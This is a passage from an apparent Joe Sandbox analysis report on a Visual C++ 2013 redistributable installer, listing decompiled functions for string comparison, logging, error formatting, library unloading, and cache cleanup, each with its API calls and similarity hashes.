Opcode Fuzzy Hash: 67077a98d91346147cc0fc86f26357163e99beaf3e4023a1a0e9aaadd5731631
Instruction Fuzzy Hash: CD116072932219BBDF11FBA9D982DEEB7ACAB14654F400129FA05B7200E6705E018AE4

Uniqueness

Uniqueness Score: -1.00%

Function 01288E63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E01288E63(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr* _a12) {
				unsigned int _v8;
				unsigned int _t17;
				void* _t24;
				void* _t25;
				signed int _t27;
				signed int _t28;
				signed int _t36;
				signed int _t42;
				signed int _t46;
				unsigned int _t49;

				_t17 =  *((intOrPtr*)(_a4 + 0x1c));
				_t42 = 0;
				_v8 = _t17;
				if(_t17 == 0) {
					L7:
					 *_a12 = _t42;
					_t46 = 1;
					L8:
					return _t46;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 = _v8 >> 1;
					_t36 = _t49 + _t42;
					_t24 = CompareStringW(0x7f, 0x1000, _a8, 0xffffffff,  *(_t36 * 0x30 +  *((intOrPtr*)(_a4 + 0x20))), 0xffffffff) - 1;
					if(_t24 == 0) {
						_v8 = _t49;
						goto L6;
					}
					_t25 = _t24 - 1;
					if(_t25 == 0) {
						 *_a12 = _t49 + _t42;
						_t46 = 0;
						goto L8;
					}
					_t27 = _t25 - 1;
					if(_t27 != 0) {
						_t28 = GetLastError();
						if(_t28 > 0) {
							_t28 = _t28 & 0x0000ffff | 0x80070000;
						}
						_t46 = _t28;
						if(_t46 >= 0) {
							_t46 = 0x80004005;
						}
						E012B294E(_t28, "variable.cpp", 0x4c1, _t46);
						_push("Failed to compare strings.");
						_push(_t46);
						E012AFA86();
						goto L8;
					}
					_v8 = _v8 + (_t27 | 0xffffffff) - _t49;
					_t11 = _t36 + 1; // 0x31
					_t42 = _t11;
					L6:
				} while (_v8 != 0);
				goto L7;
			}

0x01288e6a
0x01288e70
0x01288e72
0x01288e77
0x01288ec1
0x01288ec6
0x01288ec8
0x01288ec9
0x01288ecf
0x00000000
0x00000000
0x00000000
0x01288e79
0x01288e79
0x01288e7f
0x01288e81
0x01288ea2
0x01288ea3
0x01288eb8
0x00000000
0x01288eb8
0x01288ea5
0x01288ea6
0x01288f15
0x01288f17
0x00000000
0x01288f17
0x01288ea8
0x01288ea9
0x01288ed2
0x01288eda
0x01288ee1
0x01288ee1
0x01288ee6
0x01288eea
0x01288eec
0x01288eec
0x01288efc
0x01288f01
0x01288f06
0x01288f07
0x00000000
0x01288f0d
0x01288eb0
0x01288eb3
0x01288eb3
0x01288ebb
0x01288ebb
0x00000000

APIs

CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,?,000000FF,?,00000000,00000030,0128982F,?,0128ADF0,?,00000030,00000000,00000030), ref: 01288E9C
GetLastError.KERNEL32(?,0128ADF0,?,00000030,00000000,00000030,0128982F,?,0128B589,?,?,00000030), ref: 01288ED2

Strings

variable.cpp, xrefs: 01288EF7
Failed to compare strings., xrefs: 01288F01

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp
API String ID: 1733990998-1686915864
Opcode ID: 159b095051dfdaf6947ab0e1f09c9ec864be06780c00316f90c12a4b12c61d01
Instruction ID: 93158fb667de0e03b4cd239cb9efcec821b681a43ab1adf34b738b94afb7a590
Opcode Fuzzy Hash: 159b095051dfdaf6947ab0e1f09c9ec864be06780c00316f90c12a4b12c61d01
Instruction Fuzzy Hash: 7221EB32A36226EBDB219F5CDC41A59BBA4EF057B0B514259FA24EB2D0D674DD0087D0

Uniqueness

Uniqueness Score: -1.00%

Function 012AF0FA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
filestringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E012AF0FA(void* __ecx, CHAR* _a4) {
				long _v8;
				int _t9;
				signed int _t16;
				signed int _t21;
				CHAR* _t25;
				long _t28;

				_t23 = __ecx;
				_push(__ecx);
				_t25 = _a4;
				_t28 = 0;
				_t21 = 0;
				_v8 = 0;
				_t9 = lstrlenA(_t25);
				_a4 = _t9;
				if( *0x12d4ef0 != 0xffffffff) {
					if(_t9 == 0) {
						L11:
						return _t21;
					} else {
						goto L4;
					}
					do {
						L4:
						if(WriteFile( *0x12d4ef0, _t28 + _t25, _a4 - _t28,  &_v8, 0) != 0) {
							goto L8;
						}
						_t16 = GetLastError();
						if(_t16 > 0) {
							_t16 = _t16 & 0x0000ffff | 0x80070000;
						}
						_t21 = _t16;
						if(_t21 < 0) {
							E012B294E(_t16, "logutil.cpp", 0x318, _t21);
							goto L11;
						}
						L8:
						_t28 = _t28 + _v8;
					} while (_t28 < _a4);
					goto L11;
				}
				_t21 = E012B13CB(_t23, 0x12d5d98, _t25, 0);
				if(_t21 >= 0) {
					_t21 = 0;
				}
				goto L11;
			}

0x012af0fa
0x012af0fd
0x012af101
0x012af104
0x012af107
0x012af109
0x012af10c
0x012af119
0x012af11c
0x012af136
0x012af18c
0x012af192
0x00000000
0x00000000
0x00000000
0x012af138
0x012af138
0x012af156
0x00000000
0x00000000
0x012af158
0x012af160
0x012af167
0x012af167
0x012af16c
0x012af170
0x012af187
0x00000000
0x012af187
0x012af172
0x012af172
0x012af175
0x00000000
0x012af17a
0x012af12a
0x012af12e
0x012af130
0x012af130
0x00000000

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,012AF2EC,?,?,0128312E,00000000,0000FDE9,?,0128312E,?,Failed to read data for message.), ref: 012AF10C
WriteFile.KERNEL32(?,?,0128312E,00000000,?,?,012AF2EC,?,?,0128312E,00000000,0000FDE9,?,0128312E,?,Failed to read data for message.), ref: 012AF14E
GetLastError.KERNEL32(?,?,012AF2EC,?,?,0128312E,00000000,0000FDE9,?,0128312E,?,Failed to read data for message.,pipe.cpp,00000340,?), ref: 012AF158

Strings

logutil.cpp, xrefs: 012AF182

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 0e72e522d33101df5c5787176f3d6499e400b7916a61849f448de5f43d28938d
Instruction ID: c153a61cddf4e4cdd39fb68dc3ccad8fbdfa6f8f383ef0edb2d8bcf7a26bf929
Opcode Fuzzy Hash: 0e72e522d33101df5c5787176f3d6499e400b7916a61849f448de5f43d28938d
Instruction Fuzzy Hash: 5011A572720306BBD7205F99EEC9A6F7EADEB16794B500239B644D7040D7B8E9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B151C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E012B151C(void* __ecx, void* __edx, intOrPtr _a4, long _a8, void* _a12, char _a16) {
				short _v8;
				char* _v12;
				long _t14;
				long _t15;
				signed int _t19;
				void* _t26;
				signed int _t31;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t14 = 0x11ff;
				_v8 = 0;
				if(_a12 != 0) {
					_t14 = 0x19ff;
				}
				_v12 =  &_a16;
				_t15 = FormatMessageW(_t14, _a12, _a8, 0,  &_v8, 0,  &_v12);
				_v12 = 0;
				if(_t15 != 0) {
					_t31 = E012B1171( &_v8, _t26, _a4, _v8, _t15);
				} else {
					_t19 = GetLastError();
					if(_t19 > 0) {
						_t19 = _t19 & 0x0000ffff | 0x80070000;
					}
					_t31 = _t19;
					if(_t31 >= 0) {
						_t31 = 0x80004005;
					}
					E012B294E(_t19, "strutil.cpp", 0x3b9, _t31);
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return _t31;
			}

0x012b151c
0x012b151f
0x012b1520
0x012b1525
0x012b152a
0x012b1530
0x012b1532
0x012b1532
0x012b153a
0x012b154e
0x012b1554
0x012b1559
0x012b1598
0x012b155b
0x012b155b
0x012b1563
0x012b156a
0x012b156a
0x012b156f
0x012b1573
0x012b1575
0x012b1575
0x012b1585
0x012b1585
0x012b159d
0x012b15a2
0x012b15a2
0x012b15ad

APIs

FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,00000000,00000000,?,00000001,00000000,?,?,?,01295F95,00000000,00000000,00000000), ref: 012B154E
GetLastError.KERNEL32(?,?,?,01295F95,00000000,00000000,00000000,00000000,?,?,01292015,?,?,80070656,00000001,?), ref: 012B155B
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,01295F95,00000000,00000000,00000000,00000000,?,?,01292015,?), ref: 012B15A2

Strings

strutil.cpp, xrefs: 012B1580

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 3b3c2eb01e16b4f3e81e0bab224cb5cbde63a1070f772cfdf0fb8dd33a7d5699
Instruction ID: 750bcb51f6a6da169ea39293d7ee2c59edecb535a0aa6ec684d95c17eedc2f04
Opcode Fuzzy Hash: 3b3c2eb01e16b4f3e81e0bab224cb5cbde63a1070f772cfdf0fb8dd33a7d5699
Instruction Fuzzy Hash: 3F11E172920105FFDB219F98FC998EEBE79EF44390F240169FA02E3150E2758B10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0128BAFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0128BAFC(intOrPtr _a4) {
				signed int _t10;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t13;
				signed int _t15;
				signed int _t20;
				intOrPtr _t21;

				_t21 = _a4;
				_t10 =  *(_t21 + 0x10);
				_t20 = 0;
				if(_t10 != 0) {
					 *((intOrPtr*)( *_t10 + 8))(_t10);
					 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0;
				}
				_t11 =  *(_t21 + 0xc);
				if(_t11 != 0) {
					_t13 = GetProcAddress(_t11, "BootstrapperApplicationDestroy");
					if(_t13 != 0) {
						 *_t13();
					}
					if(FreeLibrary( *(_t21 + 0xc)) == 0) {
						_t15 = GetLastError();
						if(_t15 > 0) {
							_t15 = _t15 & 0x0000ffff | 0x80070000;
						}
						_t20 = _t15;
					}
					 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				}
				return _t20;
			}

0x0128bb00
0x0128bb03
0x0128bb07
0x0128bb0b
0x0128bb10
0x0128bb13
0x0128bb13
0x0128bb16
0x0128bb1b
0x0128bb23
0x0128bb2b
0x0128bb2d
0x0128bb2d
0x0128bb3a
0x0128bb3c
0x0128bb44
0x0128bb4b
0x0128bb4b
0x0128bb50
0x0128bb50
0x0128bb52
0x0128bb52
0x0128bb5b

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0128BB23
FreeLibrary.KERNEL32(?,?,012818A2,?,?,?,?,01281E12,?), ref: 0128BB32
GetLastError.KERNEL32(?,012818A2,?,?,?,?,01281E12,?), ref: 0128BB3C

Strings

BootstrapperApplicationDestroy, xrefs: 0128BB1D

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: 686b316c95b9a91d041f1e4afc91e2b1bcfa0a99f2deb79f74dc66e9aa615046
Instruction ID: 6a908528589d3f373ad40f0f3648780eb6ecf7c292ed446f23cb4fa1e665695a
Opcode Fuzzy Hash: 686b316c95b9a91d041f1e4afc91e2b1bcfa0a99f2deb79f74dc66e9aa615046
Instruction Fuzzy Hash: 7DF012327213069FD7305F6AE848F2777ECAF807A1B04853DEA56C7554EB79D4048B60

Uniqueness

Uniqueness Score: -1.00%

Function 012A5ECA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E012A5ECA(void* __eax) {
				void* __esi;
				signed int _t6;
				signed int _t13;

				_t1 = __eax + 0x24; // 0x526a5680
				if(SetEvent( *_t1) != 0) {
					_t13 = E012A5BB3(_t12);
				} else {
					_t6 = GetLastError();
					if(_t6 > 0) {
						_t6 = _t6 & 0x0000ffff | 0x80070000;
					}
					_t13 = _t6;
					if(_t13 >= 0) {
						_t13 = 0x80004005;
					}
					E012B294E(_t6, "cabextract.cpp", 0x12d, _t13);
					_push("Failed to set begin operation event.");
					_push(_t13);
					E012AFA86();
				}
				return _t13;
			}

0x012a5ecd
0x012a5ed8
0x012a5f1d
0x012a5eda
0x012a5eda
0x012a5ee2
0x012a5ee9
0x012a5ee9
0x012a5eee
0x012a5ef2
0x012a5ef4
0x012a5ef4
0x012a5f04
0x012a5f09
0x012a5f0e
0x012a5f0f
0x012a5f15
0x012a5f22

APIs

SetEvent.KERNEL32(526A5680,01281D56,012A614F,01281D56,?,012A0082,01282222,01281E8E,?,0128D887,?,01281D56,01281D9E,?,01281DDE,WixBundleElevated), ref: 012A5ED0
GetLastError.KERNEL32(?,012A0082,01282222,01281E8E,?,0128D887,?,01281D56,01281D9E,?,01281DDE,WixBundleElevated,00000000,00000000,00000001,01281DDE), ref: 012A5EDA

Strings

Failed to set begin operation event., xrefs: 012A5F09
cabextract.cpp, xrefs: 012A5EFF

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 4aec4b42ca81a21f67a73369186c7a78322c155e509ac44ee88e4e72d0fc0152
Instruction ID: 91ac514dc6e5d63edcd2a495c843a62032e61a15dfd11f222600988788e72015
Opcode Fuzzy Hash: 4aec4b42ca81a21f67a73369186c7a78322c155e509ac44ee88e4e72d0fc0152
Instruction Fuzzy Hash: E6E0D833AB663367D73022697E09B673AC89F05FE1B55027DEB05E7250E998DC0047D0

Uniqueness

Uniqueness Score: -1.00%

Function 012AE78E Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E012AE78E(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E012AA426( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E012AD91C( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x10843c7
								__eflags = MultiByteToWideChar( *_t40, 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E012AA279(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x56800700
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x56800700
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x56800700
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x10843c7
							_t58 = MultiByteToWideChar( *_t21, 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x012ae798
0x012ae79f
0x012ae7b6
0x00000000
0x012ae7a6
0x012ae7a8
0x012ae7c2
0x012ae7c7
0x012ae7ca
0x012ae7cd
0x012ae7f5
0x012ae7fc
0x012ae7fe
0x012ae87f
0x012ae891
0x012ae89a
0x012ae89c
0x012ae7dc
0x012ae7dc
0x012ae7df
0x012ae7e1
0x012ae7e4
0x012ae7e4
0x012ae7e4
0x012ae7e4
0x00000000
0x012ae7ea
0x012ae85e
0x012ae85e
0x012ae863
0x012ae869
0x012ae86c
0x012ae86e
0x012ae871
0x012ae871
0x012ae871
0x012ae871
0x00000000
0x012ae875
0x012ae800
0x012ae803
0x012ae803
0x012ae809
0x012ae80c
0x012ae833
0x012ae836
0x012ae836
0x012ae83c
0x00000000
0x00000000
0x012ae83e
0x012ae841
0x00000000
0x00000000
0x012ae843
0x012ae843
0x012ae843
0x012ae849
0x012ae84c
0x012ae7bb
0x012ae7bb
0x012ae855
0x00000000
0x012ae855
0x012ae80e
0x012ae811
0x00000000
0x00000000
0x012ae815
0x012ae823
0x012ae826
0x012ae82c
0x012ae82e
0x012ae831
0x00000000
0x00000000
0x00000000
0x012ae831
0x012ae7cf
0x012ae7d2
0x012ae7d4
0x012ae7d9
0x012ae7d9
0x00000000
0x012ae7aa
0x012ae7aa
0x012ae7af
0x012ae7b3
0x012ae7b3
0x00000000
0x012ae7af
0x012ae7a8

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012AE7C2
__isleadbyte_l.LIBCMT ref: 012AE7F5
MultiByteToWideChar.KERNEL32(010843C7,00000009,?,56800700,00000000,00000000,?,?,?,0128312E,?,00000000), ref: 012AE826
MultiByteToWideChar.KERNEL32(010843C7,00000009,?,00000001,00000000,00000000,?,?,?,0128312E,?,00000000), ref: 012AE894

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 621a5c97496c4276b2eec1bfce6e8cc82de9017b466d1ba5326cbe62f56e174a
Instruction ID: 71a6f8d76858d27ff85a99343274e0c4a8aee5cdcb6dabdbdb57052e67c394a5
Opcode Fuzzy Hash: 621a5c97496c4276b2eec1bfce6e8cc82de9017b466d1ba5326cbe62f56e174a
Instruction Fuzzy Hash: CA31D331920257EFEB25DFA8CC849BE7FA5EF01310F864569E6618B1E1D731D942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01299225 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101
sleepCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E01299225(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				void* _t53;
				void* _t57;

				_t51 = __edx;
				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = 0;
				_v8 = 0;
				if(E0129743F(__ecx, __edi, _a8, 0x12ba5c8,  &_v12) >= 0) {
					_t57 = E012B201F(__ecx, __edx, _v12, _a16,  &_v8);
					if(_t57 >= 0) {
						_t57 = E012B1E29(_t48, __edi,  &_v8);
						if(_t57 >= 0) {
							_push(__edi);
							_push(_v8);
							E01281566(2, (0 | _a4 != 0x00000000) + 0x2000015f, _a12);
							_t57 = 0x80004005;
							_t53 = 0;
							while(_t53 < 3) {
								if(_t53 > 0) {
									Sleep(0x7d0);
								}
								_t57 = E012B66A3(_t51, _v8, 7);
								if(_t57 != 0x80070003) {
									_t53 = _t53 + 1;
									if(_t57 < 0) {
										continue;
									}
								}
								break;
							}
							if(_t57 >= 0) {
								E012B66A3(_t51, _v12, 4);
							} else {
								_push(_t57);
								_push(_v8);
								E01281566(2, (0 | _a4 != 0x00000000) + 0xa0000161, _a12);
								_t57 = 0;
							}
							L16:
							if(_v8 != 0) {
								E012B01E8(_v8);
							}
							if(_v12 != 0) {
								E012B01E8(_v12);
							}
							return _t57;
						}
						_push("Failed to ensure cache directory to remove was backslash terminated.");
						L6:
						_push(_t57);
						E012AFA86();
						goto L16;
					}
					_push("Failed to combine id to root cache path.");
					goto L6;
				}
				_push("Failed to calculate root cache path.");
				goto L6;
			}

0x01299225
0x01299225
0x01299228
0x01299229
0x0129923a
0x0129923d
0x01299249
0x01299261
0x01299265
0x01299277
0x0129927b
0x01299294
0x01299295
0x012992a6
0x012992ae
0x012992b3
0x012992b5
0x012992bc
0x012992c3
0x012992c3
0x012992d3
0x012992db
0x012992dd
0x012992e0
0x00000000
0x00000000
0x012992e0
0x00000000
0x012992db
0x012992e5
0x0129930f
0x012992e7
0x012992ec
0x012992ed
0x012992fe
0x01299306
0x01299306
0x01299314
0x01299317
0x0129931c
0x0129931c
0x01299324
0x01299329
0x01299329
0x01299333
0x01299333
0x0129927d
0x01299282
0x01299282
0x01299283
0x00000000
0x01299289
0x01299267
0x00000000
0x01299267
0x0129924b
0x00000000

APIs

Sleep.KERNEL32(000007D0,?,00000000,00000000,?), ref: 012992C3

Strings

Failed to ensure cache directory to remove was backslash terminated., xrefs: 0129927D
Failed to combine id to root cache path., xrefs: 01299267
Failed to calculate root cache path., xrefs: 0129924B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate root cache path.$Failed to combine id to root cache path.$Failed to ensure cache directory to remove was backslash terminated.
API String ID: 3472027048-541824359
Opcode ID: 2a84c2f1f4c50484d462dc49fa59ecfa3510864ec12ddc321cc0a3356eacc81b
Instruction ID: 3c0ac1d1454fe34f75a8af09a5e98b80b2e80574f5ac41438dd6a9c8291e17ad
Opcode Fuzzy Hash: 2a84c2f1f4c50484d462dc49fa59ecfa3510864ec12ddc321cc0a3356eacc81b
Instruction Fuzzy Hash: 0731E072D3012AFADF11BFA8DC859FEBA69EB14368F0100BDEA0676041D2714ED19A90

Uniqueness

Uniqueness Score: -1.00%

Function 012B535F Relevance: 6.1, APIs: 4, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E012B535F(void* __eax, intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v20;
				char _v28;
				intOrPtr* _t26;
				signed int _t28;
				signed int _t29;
				intOrPtr* _t36;
				signed int* _t38;
				void* _t39;
				void* _t47;
				void* _t51;

				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				__imp__#2(_a8);
				_t39 = __eax;
				__imp__#8( &_v28);
				_t26 = _a4;
				_t47 =  *((intOrPtr*)( *_t26 + 0x44))(_t26,  &_v8);
				if(_t47 >= 0) {
					_t47 = E012B4F42( &_v12, _v8, __eax,  &_v12);
					if(_t47 != 1 && _t47 >= 0) {
						_t36 = _v12;
						_t47 =  *((intOrPtr*)( *_t36 + 0x20))(_t36,  &_v28);
						_t51 = _t47;
						if(_t51 >= 0 && _t51 == 0) {
							_t38 = _a12;
							if(_t38 != 0) {
								_v20 = _v20 & 0x00000000;
								 *_t38 = _v20;
							}
						}
					}
				}
				_t28 = _v8;
				if(_t28 != 0) {
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				_t29 = _v12;
				if(_t29 != 0) {
					 *((intOrPtr*)( *_t29 + 8))(_t29);
				}
				__imp__#9( &_v28);
				if(_t39 != 0) {
					__imp__#6(_t39);
				}
				return _t47;
			}

0x012b5365
0x012b5369
0x012b5372
0x012b5378
0x012b537e
0x012b5384
0x012b5391
0x012b5395
0x012b53a4
0x012b53a9
0x012b53af
0x012b53bc
0x012b53be
0x012b53c0
0x012b53c4
0x012b53c9
0x012b53ce
0x012b53d2
0x012b53d2
0x012b53c9
0x012b53c0
0x012b53a9
0x012b53d4
0x012b53d9
0x012b53de
0x012b53de
0x012b53e1
0x012b53e6
0x012b53eb
0x012b53eb
0x012b53f2
0x012b53fa
0x012b53fd
0x012b53fd
0x012b5408

APIs

SysAllocString.OLEAUT32(?), ref: 012B5372
VariantInit.OLEAUT32(?), ref: 012B537E
VariantClear.OLEAUT32(?), ref: 012B53F2
SysFreeString.OLEAUT32(00000000), ref: 012B53FD

Part of subcall function 012B4F42: SysAllocString.OLEAUT32(?), ref: 012B4F57

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

